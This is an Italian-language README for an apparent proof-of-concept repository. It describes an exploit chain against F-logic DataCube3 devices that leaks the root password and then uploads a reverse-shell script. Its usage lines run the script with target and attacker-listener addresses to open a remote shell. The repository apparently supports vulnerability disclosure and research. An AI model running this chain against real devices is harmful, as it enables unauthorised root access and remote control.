
PoC Script per CVE-2024-25832: catena di exploit reverse shell, divulgazione di informazioni (perdita della password di root) + upload di file senza restrizioni in DataCube3
Questo repository presenta un Proof of Concept (PoC) per una catena di exploit in due fasi che prende di mira i dispositivi DataCube3. Combina CVE-2024-25830 (Controllo degli accessi improprio) per estrarre le password di root e CVE-2024-25832 (Caricamento di file senza restrizioni) per distribuire uno script di reverse shell. Questo PoC integra l'analisi dettagliata delle vulnerabilità nel post del blog "DataCube3 Vulnerability Report".
Tutti i dispositivi F-logic DataCube3 versione 1.0.
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

SOLO A SCOPO EDUCATIVO.